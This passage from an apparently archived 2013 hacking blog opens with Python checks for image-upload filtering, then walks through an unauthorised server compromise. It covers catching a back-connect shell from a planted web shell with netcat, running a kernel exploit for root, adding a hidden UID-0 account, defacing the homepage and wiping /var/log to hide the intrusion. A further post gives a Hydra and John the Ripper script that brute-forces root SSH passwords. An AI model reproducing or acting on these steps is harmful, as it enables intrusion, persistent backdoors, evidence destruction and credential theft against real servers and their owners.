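    if parts.scheme not in ("http", "https") or not host:
        return False
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)


def loose_ext_ok(src):
    """'Looks like an image' judged by its tail: image.php;.png ends in .png."""
    return src.lower().endswith(tuple(IMAGE_TYPES))


def strict_ext_ok(src):
    """Exactly one extension from the allow-list, and a plain file name in front of it."""
    name = posixpath.basename(urlsplit(src).path)
    root, ext = posixpath.splitext(name)
    return ext.lower() in IMAGE_TYPES and SAFE_NAME.fullmatch(root) is not None


def sniff_image(data):
    """Magic-byte check on the fetched bytes: 'png', 'jpeg', 'gif' or None."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    return None


def cache_name(data):
    """Server-chosen name: content hash plus the sniffed type. The client's 'image.php;.png' never reaches disk."""
    kind = sniff_image(data)
    if kind is None:
        raise ValueError("fetched content is not an image")
    return hashlib.sha256(data).hexdigest() + "." + kind


if __name__ == "__main__":
    evil = "http://flickr.com.domain.0fees.net/image.php;.png"
    print("loose host:", loose_host_ok(evil), " strict host:", strict_host_ok(evil))
    print("loose ext :", loose_ext_ok(evil), " strict ext :", strict_ext_ok(evil))
```

The sniff is deliberately shown to pass a polyglot (a real PNG header with PHP appended, which is what iCon2PHP produces), so it is not a defence on its own: what stops the shell is that the stored file gets a server-generated name with an image extension and lives in a directory the web server never hands to the PHP interpreter.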

Website... shelled!

OK. Your website is shelled. This means you now have your shell uploaded and are ready to root the server.
You could easily deface the website now, but it is better to root the server first, so you can cover your tracks quickly.

Root the server:

Now that you have shelled your website we can start the process of rooting the server.

What is rooting when it comes to server hacking?
---> Rooting a server is the procedure by which the attacker acquires root privileges on the whole server. If you don't understand this yet, I assure you that by the end of the section "Rooting a server" you will have understood exactly what it is...

Let's proceed to rooting...

Connect via netcat:
1. Open a port on your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems...)
2. Open a terminal.
3. Start a listener on that port:

nc -l -n -v -p 402

4. It should produce output like this:

listening on [any] 402 ...

5. Now go to the back-connect function in the shell.
6. Complete it with the following:

Host: YourIPAddress   Port: 402 (or the port you forwarded...)

7. Hit connect and... voila! Connected to the server!

Downloading and executing the kernel exploit:

1. Now, if you type:

whoami

you will see that you are not root yet...
2. To do so we have to download a kernel exploit. The kernel version is shown in your shell. Find kernel exploits here...
3. Download it to your disk and then upload it to the server via the shell. Unzip it first, if zipped...
4. Now do the following exploit preparations:

- The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)

((If the program is in C you first have to compile it: gcc exploit.c -o exploit. This needs a compiler on the target, and the exploit has to match the running kernel version, or it will fail or crash the box.))

- Make the exploit executable:
chmod +x exploit

5. Execute the exploit. Type:

./exploit

6. Root permissions acquired! Type this to check:

id

or

whoami

7. Add a new root user (UID 0, duplicating root's ID):

useradd -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1

where root1 is your desired username (on Debian-based systems adduser is a different front end; this option syntax is useradd's).

8. Set the password of the new root user:

passwd root1

SUCCESSFULLY ROOTED!

Deface the website:

What is defacing?
Defacing is the procedure by which the attacker uploads his own index page to replace the homepage of a site. In this way he can boost his reputation or pass a message to the people or the company which owns the website.

Since you have the website shelled, you just create a nice hacky page in HTML and upload it via the shell as index.html (delete or rename the website's own one...).

Cover your tracks:

Till now you were behind the anonymity of Tor or proXPN. However, to make it harder for the admin to locate you, we have to deal with the logs.

First of all, Unix-based machines have some logs that you had better either edit or delete.
Common Linux log files and their usage:

/var/log/messages: general system messages
/var/log/auth.log: authentication logs
/var/log/kern.log: kernel logs
/var/log/cron.log: crond logs (cron jobs)
/var/log/maillog: mail server logs
/var/log/qmail/: qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd/: lighttpd access and error logs directory
/var/log/boot.log: system boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: authentication log
/var/log/utmp or /var/log/wtmp: login records
/var/log/yum.log: yum log files

In short, /var/log is where you should find all the Linux log files.

To delete all of them at once:

su root1

rm -rf /var/log
mkdir /var/log

Keep in mind this is the loudest possible way to do it: running daemons lose their open log files, an empty /var/log is itself a glaring indicator, and any host that ships logs to a central syslog server (most managed hosting does) keeps a copy you cannot reach from the box.

The video of this, as an example in a virtual lab, is here from my team :) ViArt Exploit

Friday, June 21, 2013

I hate downloading WordLists



1. Introduction

You most definitely know of THC Hydra... well, I love the tool; the problem is... Hydra doesn't digest huge password lists. The reason is that Hydra first loads your whole password file into memory (RAM) before starting the brute-force attack, so you are limited by your memory size. Plus I hate downloading the darn wordlists or dictionaries. Why? It takes too much time, they change every now and then... my internet speed sometimes sucks, and the bundles, lord, the bundles... so here is my tune-up... why don't we use two tools?

HYDRA and John the Ripper

It's OK with a usual password dictionary, but you could want more, something like a password list generated by John the Ripper (John provides great ways to generate passwords: digit/alpha/special-chars only, "rules" options, "external" filters, etc.).

Our goal is to use the output of John the Ripper with Hydra.

The method is trivial but does the job:

loop

(1) Generate passwords with John the Ripper into a file for a few seconds (the file grows very quickly).

Keep John's session file.

(2) Run Hydra with the password file.

(3) If a password is found, exit. If not, resume the session created in (1).

end loop



2. The script

This is the bash script I wrote to perform the task.

· Review the 'hydra_*' variables (run 'hydra -h' if needed). See 'hydra_host', 'hydra_port', 'hydra_module', ... and maybe 'hydra_all_params'.

· Review the 'john_*' variables. See 'john_all_params' and choose your template (--incremental:All, --incremental:Digits, --incremental:Alpha, --single, --rules ...); see the john.conf file for the list.

Enjoy!

Get hydra-john.sh

#!/bin/sh
# hydra-john.sh: feed John the Ripper's generated candidates to Hydra in batches,
# so Hydra never has to hold a huge wordlist in memory.

hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

hydra_module="ssh2"          # newer Hydra releases name this module "ssh"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns"

john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20            # seconds to let john generate before each hydra run

if [ -z "$john_sessionfile" ]; then
    echo "Usage: $0 <john session file>"
    exit 1
fi

# unpredictable temp names: /tmp is shared with every other user on the box
tmp_passwd="$(mktemp /tmp/pwd.XXXXXX)"
hydra_logfile="$(mktemp /tmp/hydralog.XXXXXX)"
trap 'rm -f "$tmp_passwd" "$hydra_logfile"' EXIT

while :; do
    # generate some passwords with john the ripper
    echo; echo "- Start (re)generating passwords with John"
    if [ -e "$john_sessionfile.rec" ]; then
        # session exists: resume it where the previous batch stopped
        "$john" --restore="$john_sessionfile" > "$tmp_passwd" &
    else
        # no session yet: create it
        "$john" $john_all_params --session="$john_sessionfile" > "$tmp_passwd" &
    fi
    john_pid=$!

    # wait $john_time_step seconds, then stop john (it saves its session on SIGTERM) and run hydra
    echo "- Wait ..."
    sleep "$john_time_step"
    echo "- Stop john"
    kill "$john_pid" 2>/dev/null       # only our john, not every john on the machine
    wait "$john_pid" 2>/dev/null
    sleep 1

    # start hydra on this batch
    echo; echo "- Start hydra"; echo
    : > "$hydra_logfile"
    echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module"
    "$hydra" -l root -P "$tmp_passwd" $hydra_all_params "$hydra_host" "$hydra_module" | tee -a "$hydra_logfile"

    # hydra prints a line naming the module for a valid pair; skip its [DATA] banner lines
    if [ -n "$(grep "$hydra_module" "$hydra_logfile" | grep -v DATA)" ]; then
        echo; echo "FOUND !!"
        grep "$hydra_module" "$hydra_logfile" | grep -v DATA
        exit 0
    fi
done



happy hunting ... oops learning .... p.s to check out this trick with a proxy(tor) check this site...am here fuu








Mac OSX and penetration Testing



I am a MacBook/Mac OS X user and I love pentesting... problem is, the Mac doesn't have a pentest environment unless I run a VM with my FreeBSD and its tools... Aside from that, I love custom tools, so I also have custom tools, either by my own hand or from others...

Setting up a pen-testing environment on your Mac

Download and install Xcode
Open Xcode > Preferences > Downloads > Install Command Line Tools

Open Terminal:
> java
If no Java runtime is present, OS X offers to install one; accept it.

Install Homebrew (fuck MacPorts)
> ruby -e "$(curl -fsSkL raw.github.com/mxcl/homebrew/go)"
(this is the 2013 installer URL; check the Homebrew site for the current one)

Run brew doctor (you may need to fix the $PATH in your .bash_profile)
> brew doctor

Install nmap (nping ships with it), Ruby and a database for Metasploit
> brew install nmap
> brew install ruby
> brew install postgresql (if you prefer MySQL: brew install mysql)

Start up PostgreSQL and create the Metasploit database (the server has to be running before createuser)
> initdb /usr/local/var/postgres
> pg_ctl -D /usr/local/var/postgres -l /usr/local/var/postgres/server.log start
> createuser msf -P -h localhost
> createdb -O msf msf -h localhost

Install Metasploit gems
> gem install pg sqlite3 msgpack hpricot

Set up a VNC viewer wrapper for MSF
> echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
> echo open vnc://\$1 >> /usr/local/bin/vncviewer
> chmod +x /usr/local/bin/vncviewer

Install Metasploit (from the repository)
Select the directory to install Metasploit in (e.g. ~/tools)
> git clone git://github.com/rapid7/metasploit-framework.git

Additional tools:
brew install dsniff (password sniffer)
brew install ettercap (MitM made easy)
brew install aircrack-ng (wifi suite)
brew install john (John the Ripper)
brew install hydra (brute-force cracker)
brew install ophcr (rainbow table cracker)
brew install skipfish (web app scanner)

"tcpdump" and "netcat" are pre-installed on OS X (don't overlook them).

Download and install Burp Suite Free
http://www.portswigger.net/burp/download.html

ARCHIVED

:) No longer posting, all articles should be treated as archived and outdated